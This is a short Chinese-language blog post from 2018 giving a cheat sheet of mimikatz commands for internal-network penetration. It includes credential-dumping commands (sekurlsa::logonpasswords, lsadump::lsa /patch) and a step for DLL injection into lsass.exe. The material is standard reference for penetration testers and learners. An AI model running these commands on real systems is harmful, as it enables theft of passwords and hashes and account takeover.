Ywc

mimikatz内网渗透

Word count: 344 / Reading time: 1 min
2018/06/14 Share

mimikatz常用命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
system::user        //查看当前登录的用户
process::list //列出进程
process::stop processname //结束进程(有些进程结束不了,即使权限够大)
process::suspend processname //暂停进程
process::modules //列出系统核心模块和其所在的物理路径
service::list //列出系统服务
service::stop(start) service_name //停止(开启)服务
privilege::list //列出系统权限列表
privilege::debug /提升权限 (执行这条命令得有足够的权限)
nogpo::cmd //打开cmd
nogpo::regedit //打开注册表
ts::sessions //显示当前回话
ts::processes //显示当前进程及其PID
sekurlsa::logonpasswords //获取当前在线用户的明文密码(需要高权限运行)
lsadump::lsa /patch //获取当前此计算机存在过用户的NTLMHASH
inject::process lsass.exe '路径' sekurlsa.dll //进程注入(如果用1.0版本获取hash的时候发现sekurlsa模块存在,就可以用进程注入一个dll文件,然后在获取hash)

使用:

1.首先以管理员身份运行mimikatz.exe

2.运行下面指令,即可得到当前内网中的所有密码。

1
2
privilege::debug           //提升权限
sekurlsa::logonpasswords //抓取密码

参考链接:

http://www.cnblogs.com/pursuitofacm/p/6706841.html

https://blog.csdn.net/pyphrb/article/details/52051321

http://blog.51cto.com/z2ppp/2060051

原文作者: Ywc

原文链接: https://yinwc.github.io/2018/06/14/mimikatz/

发表日期: June 14th 2018, 2:33:25 pm

版权声明:

CATALOG
  1. 1. mimikatz常用命令
  2. 2. 使用: